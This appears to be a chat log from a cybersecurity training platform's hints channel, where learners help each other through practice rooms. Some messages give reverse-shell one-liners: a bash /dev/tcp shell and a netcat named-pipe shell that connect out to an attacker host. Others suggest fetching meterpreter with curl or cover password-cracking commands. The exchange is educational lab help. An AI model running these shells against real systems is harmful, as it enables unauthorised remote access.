#room-hints
Please don't ask for hints on newly released rooms.
Didnt ask
||any hints on "chill hack"? im on /secret/||
You're asking in the hints channel about a new room. Do you understand?
any hint on searchlightosint task 7 for the photographer's name?
That's a brand new challenge room
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
sorry, just seeing that now
Please wait 72 hours from release before asking.
apologies
Thank you
I'll keep trucking at it
impatience
great room btw, thanks to @final stratus
I'm glad you like it @blazing thorn!
I recognised the restaurant immediately, that place is delicious!!!!
I've only been once, it was 8 years ago, but I remember it really well
hello guys any hint to get flag1 in "linux strength training" ?
they are asking to use find command to find file with modified date 2016-09-12 in the workflow directory
if you look in the text, there is a row on it
that'll get you everything newer
you'll want newer than yesterday and older than tomorrow to find today
i used the ! -newermt also
oh got you
good hunting
@final stratus is there an error on task 8, question 1? feels like first word should be 5 characters
naw, it's fine
more of an Anglophone reference though
kk, tis the last one to get for the room
hmm?
ah ok
Task 7 in What the Shell - I'm pretty sure I have the correct answer, but it won't accept. I've researched, found a walkthrough, checked and doublechecked. I'm suspecting it is a small typo or such? I'm using ||socat OPENSSL-LISTEN:53,cert=encrypt.pem,FILE:tty,raw,echo=0|| Any help appreciated - I hate leaving a room "incomplete" due to one lousy thing.
well done @blazing thorn!
Can I have a hint for Overpass? I pulled exif data and I think I have a username but is this username in username@overpass.com or is it just 'username' ?
it's pretty dumb, look at how the thing actually works before breaking out the big guns
Alright, I'll re-examine
I see now. Hello SSH.
good hunting
the rest is really cute
I have to writeup part 2 one of these days
can i have some help with chill hack? i cant get a shell
Not every situation might be about getting a (reverse) shell. See what you can (and can't) do, then combine the steps to go deeper
@oblique bloom keep dir-bustering
Where is the first place the computer will look to find the ip address of a domain ?
Is this related to room?
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done.
@opaque remnant you are missing one small thing after pem
What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called "encrypt.pem" ANSWERED. ----- PROBLEM QUESTION: What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called "encrypt.pem"
Need help with that
Room is "what the shell"
@penny i think there is a bug with that
written 15 variants
listener
just cant get it working
its wrong but use listener
pood can you dm me what you have in mind if you got the whole string?
So over this
What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called "encrypt.pem" ANSWERED. ----- PROBLEM QUESTION: What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called "encrypt.pem"
count the stars
sure the one you posted before, replace the last comma with a space
i mean between pem and FILE
and use backticks
not single quotes
tty needs to be executed
yeah I know Ok will try that
Hi everyone
I'm stuck in this room, thought i could use some help
Here it is...honestly I don't understand the question or my next move, please help me understand
Which room?
web fundamentals : ZTH2
check out xsrfprobe --help. the answer will be there
thanks found it, man the easiest thing can be sometimes hidden in plain sight lol
i learned something valuable today...thanks @remote gate
you're welcome. don't sweat it. it happens
Each time you run the script, you have to check the EIP. The EIP can change each time.
EIP being the instruction pointer?
just be sure im on the ||secret|| already and i was able break out of the filtering, and im trying to get a reverse shell and i get a connect on the listener but no shell
SQLi task 7 am I missing something? I am following instructions correctly, I am getting an error, Unable to connect?
I am unable to connect, why is that? any suggestions, yes I am connected to my network
SMB Client "cat" command not found.... suggestions please?
It's not a linux command line
It's an smb command line
Exit out if it to cat the file.
I got a shell pretty straight forward
what I did was a ||bash revshell|| that looks like this ||ba\sh -c 'ba\sh -i >& /dev/tcp/myip/4444 0>&1'||, but you could also ||upload a meterpreter to /tmp using curl||
Anyone doing searchlight ? I'm stuck on 7th task one with reindeer bike
need to wait 72 hours after room launch to ask for hints...I had the same question last night, DM for help if you like
!rule 13
boo
Yeah dm for help. I've had quite a few people ask for help, but i will literally just rephrase the question. Most have found it without me giving a single into. just ask questions
||ig thats a hint saying to rephrase ||
I finally found it - by watching a video that was in Russian (I think - not a lang expert) and watching the typing. LOL. It was driving me insane!
hey is there anyone here who know how to use tmux plugins?
Just ask your question directly
We don't know if we can help unless you ask directly
LOL yeah umm I need to know how to use the plugin on tmux after I loaded it..
I cant find the answer any where
which plugin though?
If this is for a specific room, please state the room and task
If not, don't ask here
Its REmux The Tmux Task 6 last question
Anybody tried the new "Searchlight - IMINT" ? How did you find the deer motorcycle picture? Tag if answer
Hi, I need help for Empire, for the next question:
What MITRE ATT&CK technique is associated with powershell/trollsploit/voicetroll?
@pseudo bobcat use the hints
no problem mate, can you tell me what you were trying to do?
I saw the hint, i did that and i still cant find it D:
hi, any hint to Regular expressions room task 4 last Q ❤️ ?
solved
just trying to get a reverse shell like you, but mine would connect but i wouldnt get a shell
but the bash tcp reverse shell worked fine
that's interesting, what was your payload?
just a traditional netcat reverse shell
never really tried those tbh
it was weird because it once i was able to make it connect
it wouldnt work
i was trying to figure it out
well next time ill jump straight to getting a reverse shell using other payloads
my advice is if you can just straight get a revshell using bash you should do so
it's easy to use and it never broke down on me
sure if it doesnt work id try another payload
but it connected so
i didnt know what was it about
||/bin/bash 0< /tmp/mypipe | nc 192.168.1.100 4444 1> /tmp/mypipe||
i used a pipe on tmp
otherwise it wouldnt bind
@night fractal uh ||mysql doesnt seem to respond to the password input||
maybe its the !
if i input it on the -p i think ! breaks it
maybe double quotes work on mysql?
hm even if im able to do it it still doesnt give a response
oh netcat shenanigans i bet
i spawned a shell with python and mysql works ok now
sry it took me long, yeah, you just needed a better shell
Hi everyone, I am trying the Wonderland series, but I am already stuck. I've already found the alice_door image and I saw that there was something written upside down, but I just can't read it. Any help would be appreciated
Have you looked at the source ?
What do you mean?
Source of the web page
I looked at multiple write-ups if that's what you mean
I meant where you have found the alice_door image , look the source of that page
I was on a different challenge, but I've already solved it
I don't think there is any. What have you tried?
the password in secret.txt
vs3curepwd
Yeah, the program is dependent on the file. You checked the de-compiler output? There is something happening with the string present in the secret.txt
Thanks for your help
hi! I have a question on "The Cod Caper" room, I just have a question left, it's about the ssh password of pingu, I read all the files belong to him, but I don't find it, I think is something with the id_rsa file, but I'm not sure, I can't decode it anyways, my question is, is that file or the password is a file in plain text?
That's a key, not a password
Just ask
im at this stage and cant really figure out wtf
i did xmas scan with -vv and still cant seem to find the answer
unless im missing something
am i?
Please don't show answers
hi all
Windows PrivEsc v1.0
Nr 9.. - reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
-> i should see the password of the admin in the registry but ... c'mon i cant see it ... looking for around 1h now ...
any hints?
got it uhh!
hi, I have a question about madness..|| is the password for the second stego the same as the first one? ||
got it, no worries.. damn, the name madness is appropriate
Hello everyone
i'm doing the OWASP juice shop and i'm stuck
i did everything as asked about the third task but i'm not able to find the proper answer format, it's like the question is not clear enough
Question #1 Task 3
q#2 is similar but if i figure the right format i can submit for that question too
Admin screen
when I was doing that I remember missing a couple of the pop ups, maybe try again? or maybe you have an extra letter or space? there's no proper formatting, is just a long string of characters like in the second question
I was wondering if anyone could provide some help on a question that I am stuck on. It is the nmap room and I have put what I believe to be the correct script and searched online and confirmed but it keeps telling me that it is incorrect.
Thank you, I have been on the manual for a while trying to figure it out and decided to finally reach out.
Did you get it?
I haven't. I even have been reading the manual on the nmap website. I am putting --script"vuln" and nmap--script"vuln" and scriptvuln
None of those are correct by any of the manual stuff
||Replace the space with an =||
I finally got it. Thank you. I was not reading the manual properly. Thank you for the help
Hi, stuck at Windows privesc task 16. I really dont find the user privilege That is used for this exploit
Hello everyone,
I am doing Advent of Cyber
Day 13- Coal for Christmas
I have found the original source code for dirty cow and found how to compile it BUT when I try to compile and execute the code I get this error
Post in #778305825797177374 Plus there is a video link at the top of the task.
The guy who did the video did not encounter any errors in it
I'll post it in advent (:
Searchlight - IMINT, Task 7, Question 2, who took the cookie from the cookie jar...I mean, who took the photo ? No, seriously, who took it ? This task should have warning something like: "Scrolling and searching through social media sites could seriously impact your eyes" possibly also add "Risk of seizure due to mass flood of pictures"
Well, all tasks solved, but this one. Needless to mention that I've gone through recommended links that the author posted, checked visitoslo site, fb, instagram, tweeter, reversed image on to me known 8 different engines.... What am I missing besides a new set of eyes
Have you already solved Task 7, Q 1?
all tasks solved, but this one
Thank you, I'll try again
Hello ! I'm currently the Windows PrivEsc (task 9: Password - Registry) and I'm stuck because I can't find the password .
Could someone please direct me?
Thank you!
OK, Physical Security Intro, Task 6, Question 8...Im stuck like Chuck...ive watched soooo many videos and read sooooo many articles and its driving me mad. Any direction is appreciated.
hi pals . I need to know the MACHINE_IP (target machine)
I'm doing the nmap labo
what should I do to get the IP?
@coarse otter Click deploy.
thk
looking for help on the room IMINT on task 4. I got the building right, but the answers for the location (country and city) are somehow wrong...
You have a name of place in the Name of the building.
I know, but it still does not accept the answer... that's why I'm asking here
nevermind, i just had to reload the page to make it work.
Hello need help for this room "NIS - Linux Part I" , i stuck in Task 1
some one can help me?
Whats the problem
i'm blocked here i can't use command like "cd" or something
Re deploy the machine
thank you
For the Ice room, Task 3, why is the first word 7 letters?
...because that's the answer?
I don't know what you expect us to say
That's what the website says, so that's what the answer is
Can I DM someone to ask for help?
Ideally ask in the help chats?
You're breaking rule 1 if you do it without getting permission first.
Room: Source. I was looking for an exploit on msfconsole and every each of them requires a password to a webmin. Do I have to bruteforce the credentials?
there is one that doesn't need creds, from 2019
I didn't expect that room would be so easy
it's a walkthrough room marked easy, keep trying boxes and you'll find one at the right level for you
I did SkyNet today and it's also marked as easy, but it took me like 2 hours to make it.
well there are only 3 levels, easy, medium & hard so each has to cover a range
difficulty is very subjective too, it's all about what you know and what you've practiced. Give it a month of trying every day and you'll probably root skynet in 10 mins
I think skynet room used to be medium one and now it's easy
Anyways, thank you @median compass for help
Hey everyone, Room: Mitre Task 5 last question. I have read the page up and down, tried every possible variant and I am still stuck. I have been answering around the idea that it's something to do with ||virtualization and sandboxing|| but nothing like that seems to work
you are looking for programs, not methods
got it, thanks. That one was sort of frustrating. Usually I come out thinking "Oh that makes sense." I don't like that one. lol
hello guys, any hint about the last question in searchlight-imint room ?
i found the place using google map 360 view but there is no name for the hotel
got it with hours of working
anyone able to lend a hand on AoC2 day issue?
what is your issue ?
@uneven inlet #778305825797177374
Hello family. I'm in the Nmap room. On task #15 Practical, there is question I totally don't understand. It goes like "there is a reason for -- what is it". Anyone give me a hint?
@stuck fractal thanks. But I'm not sure I understand the nature of the question. What am I even looking for?
Oh I see. Let me try something quickly and come back to you. Thanks
@stuck fractal I got it thanks. It was right in front of my eyes all along. But I still think that the question wasn't correctly asked, it's very misleading.
#room-bugs but I disagree
Well, it's my opinion. And to make it even worse, the characters in the answer field don't match the response. You gotta tweak it.
@pine ridge This channel is for hints with public THM rooms
You can try out Hackers and FoodCTF to get a taste for KoTH.
okay
|| What you have just done in the previous task? It can be used for the next task ||
hi GUYS
I just joined THM and stuck at very first lab of Linux Fundamental 1
In task 9 called Binary Shiba1
Hi mate, Thanks for your reply
Nah still stuck.
So, it says to create noot.txt file which i do by using touch
touch noot.txt, it doesn't tell where to make it. So i just create the file in root directory.
then I cant understand the binary shiba1 part.
I dont want to search and see solution for it online and do it proper way. But dont know what to do after creating touch file
ok
yep.
first of all, you should be making the file in the same directory where the binary is, aka the home directory of shiba1 (but I'm guessing that's what you were saying when talking about the 'root' directory 'cause I'm pretty sure that "/" is not world writeable)
and as for the binary part you just need to run it when the noot.txt file is present in the same directory and it'll give you the password for user shiba2
yeah I make it in root directory and type ./Shiba1.
But then it says no such file
here's a hint
okay, So i need to move to shiba1 directory or create it if not present.
be careful when typing stuff in linux terminal 'cause it is case sensitive
but I dont think they taught us how to create directory at this point. So wont have to create it.
they didn't, and you don't need to move anything around
you also don't need to change any directories 'cause it's all in the home folder aka the folder you were connected to if my memory serves me right
you're welcome
sorry to bother you again. But I can't still get it. I'll send ss of what I've been doing
Dont know what I'm doing wrong.
that's an attackbox, something you can deploy if you don't have a good enough machine, or just don't wanna bother installing linux on a VM or your hardware
Ah yes.
basically a Kali VM given to you by tryhackme
yes, thats correct. But still that's pretty slow. I'm more comfortable in using Kali in VM.
and the problem is that you didn't SSH into the box
But doesnt show me option do download Kali VM.
fair enough
Oh yeah, okay.
this room isn't about that, if you wanna do it that's on you
yes, I did whatever were instructions they didnt tell to join through ssh. Do they?
Ah poor me. Sorry about that.
it's all good, rookie mistakes
Thanks a lot for letting me know @night fractal
you're welcome
Ahh, they said logging through SSH is taught in Linux Fundamentals 2.
So, I thought I do not have to.
to be fair, you didn't need to, tryhackme was kind enough to give you access to the box straight from the browser (just scroll all the way up)
but a lot of new people mistake deploying the attack box with deploying the machine
in a way that's true I guess
Yes, exactly.
Hi @night fractal
Can you please tell me what means "How do you specify which shell is used when login"?
like to know if its shiba1 or shiba2?
shell is a part of terminal, it's basically the thing that runs all of your commands and scripts, and there are more than one shell (most commonly used one being bash)
okay.
the question is related to the command you were reading about in that task, since you can login using your preferred shell
now do your best to find out how do you specify which shell do you want to use when switching users
Yes. It is just first activity I'm doing for THM and already roasted
But you helped me alot mate.
it takes some time for things to get through to you so just keep going
and I also realised how silly I'm.
If that question is related to a room on tryhackme, please state the room name/task number when asking for help @subtle kindle
You'll probably get an answer quicker this way.
Sounds like something Google would know
Room: NMAP
Task 3: Nmap Switches
Third to last question, its the only one I cant seem to find. (I know Im just blind or missing it) I tried googling and checked the nmap site, somehow Im not seeing it. What switch scans "all" ports?
its in the documentation, just look carefully
hmmmm...I literally tried them all in the ports section. I'll look again...
it's quite a small switch, but its in there
hi
i got doubts
so its like when i am doing a course or learning something
in that case i have to use the attackbox by tryhackme
like i wont be able to use my vm kali machine
if i use my kali machine for doing the very same thing .......then it wont work compared to the attckbox provided by tryhackme
Then I suspect you're doing something wrong
for eg if i nmap a ip ..........i find results in the attckbox provided by tryhackme but not in my own kali box
nah i am not
Connect to the VPN in Kali.
You're asking for help. Don't argue.
i am sorry
Asking for help and then arguing when you start getting help is counterproductive and rude
You need to connect to the TryHackMe VPN to access TryHackMe boxes from your own VM or machine
!vpn
You were told this in the welcome room
Ok, but it's a requirement to access THM machines from outside the network.
how will i do that can u help
10.0.0.0/8 (10.x.x.x) is private address space. You can't reach them over the internet.
Follow the guide I linked above.
Yes.
Ok. #site-support with screenshots of the error.
yea will meet there
Hey, can anyone confirm something for me in VulnOSv2 RP Nessus task 4 q 9. I have found the web server and version number but it doesn't match up with the pattern in the answer. Does the VM have the same version as the expected answer? Also nmap'd the box and that gives the same version as nessus
What room is that?
Ah, sorry. VulnOSv2 is the name of the box currently running. The one which is launched from rpnessus
Never mind. re-run the scan after resetting the box and it seems to have found the right version
@bitter pecan Would be interesting to know if you manage to enter the right plugin id in the first question of task 5.
as I am failing
I'm in the Searchlight - IMINT room and think I found the location of the hotel (last exercise). The view matches the one in the video but I can't find a hotel name. I think the coordinates are || 1.2910883505810304, 103.84472325941232||
The first 3 words might be ||Hotel Novotel Signapore||, it matches the amount of letters : $
could i pm you so im not giving away spoilers?
Sure : )
Guys need help in searchlight task7
What have you got so far?
i think image took by "Tiberio Frascari"
Location - Astrup Fearnley Museet
But both are incorrect
No
Is .RUN supposed to precede msfvenom payload when trying to gain shell in telnet sess? I'm stuck on exploiting
Payload yes. The msfvenom command, no.
struggling a bit with day 12 of 25daysofchristmas. It seems the private key file is encrypted. I tried running johntheripper against it but it ends pretty quickly with no success. Maybe I got the syntax wrong? I would think it'd take more than 30 seconds to process all of rockyou
Room: Res. I logged onto the redis and I'm not really sure what to do next. Any hint?
still super confused. I feel like I must be doing it wrong
You can technically create files. You might notice something about another service running on the box, and how you could use file creation to get RCE.
Which private key file?
It's not an SSH key but you seem to have treated it as such?
You're given the passphrases in the hints for the questions
no you nailed it
I don't know how to know what type of private key that was, and how I might have cracked the gpg pass
It's a GPG key. You're given the passphrase for a reason
I completed it now, but I wonder if there was a way to do it without the hint
No, if you look at the passphrase you're going to really struggle to crack that
fairenough
@stuck fractal I finished the room, the only problem was I didnt know how redis works
Neither did I
I found a cool resource on it tho
||https://book.hacktricks.xyz/pentesting/6379-pentesting-redis|| @tribal olive You might have found this one
Otherwise, it's awesome
More specifically, the redis RCE section
@stuck fractal lol that's what ive been reading
for some reason i got stuck on the default web directory
the hint helped though
need help on HA Joker CTF room can anyone tell me what word list I'm suppose to use I'm on question 4
@pure thistle Please don't ask the same question across multiple chats like that, it comes off as impatient and spammy
I have already answered your question.
nvm i found it it was the default ||common.txt|| had to peek at the write up to get the answer though
hi i am getting some error in metasploit where do i ask ?
Is it a directly room related question?
Read the channel topics and make a decision
ok
Hey y'all! How I can complete this task?
Which room
U can enumerate it via nmap
Yeah, I already have the vulnerability
@white salmon google it
But I have search a lot but I can't find the CVE code
Then there will be some link of reference
if you have the exploit, what is the name of the exploit
I don't have any exploit
what did you mean by this?
I already have the vulnerability, but I haven't the exploit
what is the vulnerability then?
what room is it?
Simple CTF
Yeah
surround them in double pipes if you really have to ||message||
theres another one further down from rapid7
ok, but it is an image
Yeah, i have tried a lot. But it is wrong
I didn't understand
there's an option to mark as spoiler in the bottom left
Thank you so much
first of all you're gonna need the full CVE code
There are only 3 ports running
||21/tcp open ftp vsftpd 3.0.3
80/tcp closed http
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)||
check the web
I found a .txt in ftp, but it's irrelevant
Have u visited the ip
I will
Yeah
What is the default page
Apache2 Ubuntu Default Page
True maybe it is an vulnerable
@white salmon Please do not post answers
i'm new to tryhackme and i'm stuck in a question. I am doing the beginner learning path and I am stuck in the default credentials of the BFF site because I can't seem to figure out what the right username:password is. Could someone drop a hint?
hello , am new here
Welcome!
Hi. This channel is for asking for hints on tryhackme rooms. #general is there if you want to say hi @potent kayak
which room are you doing on the path?
Hi, everyone.
I got stuck on the last question of Intro to x86-64 room, please help me
Please don't ask the same thing across multiple chats. It comes off as impatient and spammy.
Sorry, I'm new here
I just did the Reversing ELF room (https://tryhackme.com/room/reverselfiles)
For questions 7 & 8, if I ||modified the EIP to the giveFlag function|| would this be considered "cheating"? (it wasn't intended, by the looks of writeups)
Can someone help me with this (task 9) https://tryhackme.com/room/linux1 . Im not sure how to access shiba 1 and whats the point of noot.txt if its empty ?
the binary will only check for the existence of the file so the contents of noot.txt won't matter
when im doing ./shiba1.bin its says no such file or directory . what am i doing wrong
remove .bin
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
still no such file or directory @trim haven
Type ls and screenshot the output pls
sure,
You're doing it on the wrong machine
You're meant to do it on the machine you deploy in the room
not the attackbox :p
is it Vulnerability Assessor
Try things and see
does it say i got it right after?
If you get it wrong, keep looking
When you get it right, it will
cyber security?
@glossy jetty Enter the answer in the web page. Click Submit. If it's correct, you'll be told. If not, you'll also be told.
yayayaya
There's no penalty for wrong answers
Do not post answers.
ok sorry
Nice to know
i got the next one right
Great
i finished a room
You can do it
now what
You can choose another one
do i go dashboard
!docs free-path
By topic or following a path
i did following path
Click on that link and then do the rooms on there
which is the best learning path
Always changing
The one I just linked as you're a beginner
To be constant
which one u did as a beginner
The beginner path also it's probably best to stop asking here as we're flooding the channel now
there is no beginner path
The link I gave you
Later
ok got it
I`m going to do some room now...
You will very quickly learn that asking for help and then arguing with it gets you nowhere.
If you ask for help, listen to what people say. It's ok to ask questions, don't argue with it.
Everyone here is a volunteer
i cant lie this is driving me crazy
any hint on user in daily bugle
what have you tried so far @midnight swallow?
sudo -l, finding SUID bit, ran linpeas and it showed i could write to certain files but that didnt help, tried sshing in as the user with the password i have
i have a shell as apache
i tried to su to user with the password i have also
Keep looking. The password is the right idea.
that's the right track, linpeas should find some more interesting info for you as well
ah nice
i found it
got root too that was pretty easy
can i ask you about how i got the shell as apache
cool yeah
im on the Tutorial room, i fire the attackbox and and put in the ip on the thm page
i get a 405 error, is that supposed to happen?
@neon ridge that's the wrong IP address
Click deploy
Use the IP under Active Machine Information
You used the IP of the attack box
Oh I didn't know there's a deploy box
Thank you!
Hello guys, i have a question on https://tryhackme.com/room/linuxstrengthtraining Task 4 - 'Crack hashB.txt using john the ripper, what is the password?'
I have scp-ed the dict from remote machine to my local machine and use both john and hashcat to crack the hashB.txt but with no successful result on both tools. Here's my command:
john --format=raw-sha1 --wordlist=ww.mnf hashB.txt
with result:
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates left, minimum 8 needed for performance.
0g 0:00:00:00 DONE (2020-12-24 11:50) 0g/s 6039Kp/s 6039Kc/s 6039KC/s zythem..zythum
Session completed
and hashcat:
sudo hashcat -m 100 hashB.txt ww.mnf
with result:
`Session..........: hashcat
Status...........: Exhausted
Hash.Name........: SHA1
Hash.Target......: b7a875fc1ea228b9061041b7cec4bd3c52ab3ce3
Time.Started.....: Thu Dec 24 11:40:12 2020 (0 secs)
Time.Estimated...: Thu Dec 24 11:40:12 2020 (0 secs)
Guess.Base.......: File (ww.mnf)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2387.7 kH/s (0.57ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests
Progress.........: 241562/241562 (100.00%)
Rejected.........: 0/241562 (0.00%)
Restore.Point....: 241562/241562 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: whirlgig -> zythum
Started: Thu Dec 24 11:40:08 2020
Stopped: Thu Dec 24 11:40:13 2020`
Any further hint or advice?
you're using the wrong wordlist for hashB
@tall rain try rockyou
Ah i see so that's the problem, ok ty
i'll try, thank you
you're welcome
My machine in this room https://tryhackme.com/room/linux2 doesnt show up it says it is activated but i dont see the Linux window show up . all other machine are shut down
i restarted the browser and tried to access the same room in different browser but still doesn't launch the Linux window. Note: the other machines can be deployed in different rooms !!
You have to ssh into that machine.
Hey!!
I need help urgently. There is this problem I have been stuck with since last night. So I am trying to solve the ice room challenge and this is the error I am getting when I try to gain access using metasploit.
Exploit Completed but no session was created.
@serene bronze what task are you on? did you make sure you set your lhost to your vpn ip?
@remote gate i did that. i set the lhost to vpn ip and then rhosts to target ip of machine but its not working.
I am in the room ICE - Task 3 - Last Question
@serene bronze could you pm me a screenshot of your options?
The room is private
oh
Did you solve it with quipqiup or a tool like that?
Yeah so there are many tools that will be able to get you the original sentence but it was produced with a specific substitution in mind which you could argue isn't even a cipher. The layout you should focus on lies in front of you (literally)
@serene bronze i just noticed.. one thing i'd ask is if you could refrain from asking for help in multiple channels like you did. thanks!
Can anyone help me. I'm stuck at "Physical Security Intro" Task 6 Question no. 3, 5 and 8.
@marsh saffron ask in one channel please.
@wintry yarrow I'm sorry
beginner walkthrough
can you give me a link? I can't see that path
and did you try the username:password combinations suggested in the text?
one of the three suggested in the text will get you in
yes, i tried all of them and none would work, that's why I was so confused about it
I just tried it and it worked. With the creds, everything to the left of the : is username, everything to the right is password, don't include the :
and of course, you want to use those creds on the admin page you found in Task 1
thanks for your help, i'll try it out
Hi Folks. Can someone help me with the verification questions for 'Buffer Overflow Prep?' One of the repeating questions is:
In byte order (e.g. \x00\x01\x02) and including the null byte \x00, what were the badchars for OVERFLOWX?
I have been successfully exploiting these machines, but I can never seem to answer this question correctly.
for example, for overflow2 I identified bad characters \x00\x23\x24\x3c\x3d\x83\x84\xba\xbb I was able to use these characters to build an exploit and get a reverse shell, but the form will not accept them as a correct answer.
Am I somehow finding too many bad characters, or am I entering them incorrectly?
did you identify those characters all at once or iteratively? that's quite a lot of badchars. Sometimes if there is one badchar in your shellcode then many characters after it can be mis-identified as bad because the first one changes the meaning of the codes that follow. The best way to identify bad characters is to find one, add it to your exclusion list in msfvenom and run the shell code again, if you find another then add that to the list and run again, etc.
I see, that makes sense. I'm definitely doing it the lazy way of running a compare in mona (!mona compare -a esp -f c:\badchars.bin) and including all of the bad characters that it suggests.
I'll be less lazy next time and see if I have more luck.
yeah no, one at a time is the way
thanks!
good luck
can I still use the mona compare function to work iteratively? IE, is the first character flagged by mona more likely to be an actual bad character than the subsequent characters? Or do I need to find a new way to go through them one by one?
yeah, if mona flags badchars then take the first one and add it to your exclusion list, then run again, take the first one and add it, repeat until none showing
perfect, thanks again
in the NIS-Linux room, are we meant to escape rbash to find the flags in Task 1?
i don't remember it being quite so tricky, i think you should be able to get the answers without using cd
@median compass ok, thanks!
oh sorry, hang on, no no, the answers in task 1 are from a different room, it's to test have you done the prerequisites! @visual jolt
if you read the text you can see a link to the room in question, https://tryhackme.com/room/zthlinux
should have checked my notes before relying on my memory
then you can just copy the answers over and you're good to go
that's hilarious
i thought they were new flags
so i escaped the rshell and was trying linpeas, etc.
when all i had to do was copy-paste
it's a simpler room than that, you'll fly through it I'm sure
yeah i finished everything but that task 1 already
i just skipped over it at the beginning cause i thought maybe i would find them doing the rest of the tasks
is owasp zap present in kali already
yup
luck!
can i dm you please
i'm sure you can ask whatever it is here
why all the machine we attack have that not secure sign on the top is it because of protocol
not related to rooms just for knowledge
these are vulnerable target boxes by design, that encryption layer is on when you do online shopping etc. to prevent anyone else from intercepting your traffic and getting useful info, credit card numbers etc. For the rooms here as a rule there is nothing like that happening, these rooms are only there for learning purposes. Some times you will see https traffic but the certificates will be self-signed anyway and that will still keep the padlock from going green - don't worry about it when you are on tryhackme
thanks a lot
Hey all - welcome any help on Upload Vulnerability room task 4. I seem to lack the file necessary to unlock the flag. Any assist locating it would be welcome. FYI, I only have one file that matches the file type, but it goes by another name. Attempts to upload it were successful but didn't reveal the flag
@exotic raven ||if you have the file type needed you can just rename it||
I'm stuck on Upload Vulns, too, but on Task 8, can't find the directory it uploaded to?
using directory-list-2.3-medium but it's taking foreevvaar
just keep enumerating deeper into the directories im guessing
alright im giving up on this for tonight
on the scripting task 2, when i connect to the host and send anything it just errors out, am i supposed to send something specific to the port so it will tell me the next instruction?
ok i think i get it nm
@visual jolt thanks for the tip!
CC:pen test stuck on "what is the name of the Hidden file with extension xxa"
hey guys, merry christmas first of all
I am stuck on task 11 of linux fundamentals 2, my 3rd language is english, and I don't really understand what is asked me to do in this task "the challenge is pretty simple, the binary is checking to see if the environment variable test1234 exists, and if it's set to equal to the current $USER environment variable."
I am using export test1234=$USER, and I execute but I get a permission denied
what am I doing wrong here?
You are logged in as shiba2 right?
Can you send a screenshot?
Ok, better than nothing
What is shiba3's password?
yes this question
you have shiba2 or shiba3 in your directory?
ah my machine is expiring in 30 seconds, I'd appreciate the help and I'll try it next time
is it cheating that I am still ssh into it?
You can always add +1 hour
no I am not subbed, I wish I could
You mean you are using THM's attack box?
yeah the room machine
the one that I press "Deploy"
but instead I ssh into it, because the browser machine on my internet sucks
Ok so you have your own Kali. Then you don't need to be subscribed to add +1 hour to the room machine.
what so you mean, I can stay ssh?
Yes, but you need to press Add 1 hour button before the timer runs out.
You can redeploy the machine.
but I can still answer the questions and learn using my kali machine
I completed the whole room, but im still stuck in that shiba3 password thingy
im sorry if i am annoying but ive been trying for 3 days, I lost 3 hours of machine time trying to figure this question out
Your Executable does not have permission to execute.
||chmod||?
or something like that
exactly but in this i am not supposed to know what chmod is
yet
but anyways thanks, ill figure it out tomorrow
Any hints for me pls?
Hello, i have a problem:
Room: https://tryhackme.com/room/furthernmap
Task 14
Perform an Xmas scan on the first 999 ports of the target -- how many ports are shown to be open or filtered?
sudo nmap -sX -p0-999 10.10.171.203
gives me:
22/tcp open|filtered ssh
80/tcp open|filtered http
111/tcp open|filtered rpcbind
Answer format: ***
but answer should be: 3 or three, but its wrong. What am i doing wrong?
003
maybe?
What happens to other ports?
other ports -sX timed out but not "no response", weird
Try redeploying the machine.
maybe i scan the wrong "machine_ip"
Perform a TCP SYN scan on the first 5000 ports of the target -- how many ports are shown to be open?
its 4, but the answer is incorrect
scanned with:
sudo nmap -sS -p0-5000 10.10.171.203
Uh-oh! You are not a subscribed user and cannot deploy this machine. To subscribe visit your profile.
Oh my g0d...
i still conected via vpn, which ip to scan?, where i can find, which ip i have to scan for task 14?
You need to press the green Deploy button.
oh, i tried starting attack box, this is not the same as deploy, lessons learned.
deploy machines within task 1, ok!
ok, my fault was, instead of deploying machine in task 1, i did use the attack box as scan target. thank u for ur hints!
Hey guys I'm stuck...roomname cc pen testing task 4 last question what is the name of the hidden file with the extension xxa ?
I can't curl any of the .txt I found on the server. Says I don't have permission..?
did you run gobuster with -x .xxa?
No¿ Of course I followed the write-up but in it says to look for a .txt? At least I swore those were the instructions
Ok well thanks I'll try that
Matter fact I'll write up says a certain file should appear and it doesn't even show up on mines so that's off...?
The*
Nope unsuccessful...that .xxa file found don't help
it could be that it was an old writeup and the room changed since it was created. what do you mean by didnt help?
Well I tried accessing the phone
.xxa files can't access anything from then
are we looking at the same question? Task 4?
What is the name of the hidden file with the extension xxa
Sorry yes xxa
The file is located on the un a home for of a user
In the write-up I'm supposed to look for .txt via gobuster more specifically file called secret.txt but unable to locate?
Wait I found something...
Got it they changed it alright
Ty
